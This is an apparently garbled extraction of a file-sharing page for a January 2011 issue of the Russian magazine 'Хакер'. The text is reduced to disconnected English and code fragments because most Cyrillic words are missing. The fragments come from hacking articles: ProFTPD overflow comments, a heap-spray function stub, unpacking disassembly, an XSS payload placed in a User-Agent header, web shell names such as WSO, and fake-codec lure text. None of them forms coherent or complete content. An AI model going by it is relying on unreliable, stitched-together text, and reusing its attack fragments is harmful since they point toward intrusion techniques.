Авторское право:

Доступные форматы

Хакер 2011 01 PDF

Загружено:

Авторское право:

Доступные форматы

.

- Internet Explorer 9 Beta?

> GAMES & DIGITAL

Google Android 350

The Pirate Bay, Torrentz, Demonoid

Nimbuzz. , ICQ Nimbuzz :

$100 000 Microsoft Plants

(.. cloud computing) ,

Amazon Web Services

Instance: Micro (t1.micro)

sudo aptitude install pptpd

Technical Review, Internet

HTML5, SVG, CSS 3, ECMAScript5 DOM ,

Debian Linux (www.debian.org)

and, or ; tcp portrange 1-1024 tcp .

-sI 192.168.0.105 IP-;

Idle- Nmap Wireshark

int toread, handle_iac = TRUE, saw_newline = FALSE;

Proftpd version < 1.3.3c released.

we wrote IAC into the output buffer, and decremented

Internet Explorer 6/7/8

function alloc(bytes, mystr) {

[directory location] KB2458511.

DWORD WINAPI ResetPointer( LPVOID lpParam ) {

Trend Micro :).

G Data TotalCare 2011

edx, 83170180h ;<-----

.text:00012066 ; int __stdcall DoReleaseContext(PVOID Entry)

char pass[] = {'T', 'r', 'o', 'l',

User-Agent: Opera/10.60 '"><script>alert(document.

cx75planet.ru. User-Agent XFF. IPB

, email for login -

2010 ICQ-, , blogs.icq.com

13147C90 - NEW OEP

JMP SHORT 13140028

ADD BYTE PTR DS:[EAX],AL

Lost in Time, Dr. Web,

138 ( 2010 ) Step

In Memory Fuzzing. stack overflow

I'll crash you!

void func2(char* input)

Certification of programs for secure information

STP bitvector ( ) . , , (loop). ,

32- 64- linux

2010 Ben Hawkes, ,

args.fhsize); <----- fhsize

Control flow: LoadLibraryW

: ITSecTeam Shell v2.1

: WSO Krist_ALL edition

1. Avast Free Antivirus.

"Yo&#117; don't hav&#101; co&#100;e&#99;

def generate_string(start=5, end=7):

( template_js) JavaScript, ( Template) .

IDE Python PyCharm .

MS10-061 Print Spooler,

MS Internet Explorer ( Zeus)

general attack vector

additionall attack vector

x64- WinAPI ExitWindowsEx()

realhd.vmdk, C:, (\\.\PhysicalDrive0 Windows),

ISO- Linux- . , NTFS- Partition Magic WinXP/Win2k3

Windows Linux. UNetbootin

UNetbootin (Universal Netboot Installer) , USB-

"You don't have codec

( DWORD )(( BYTE *)Arg1 + 0x20 ) = 0;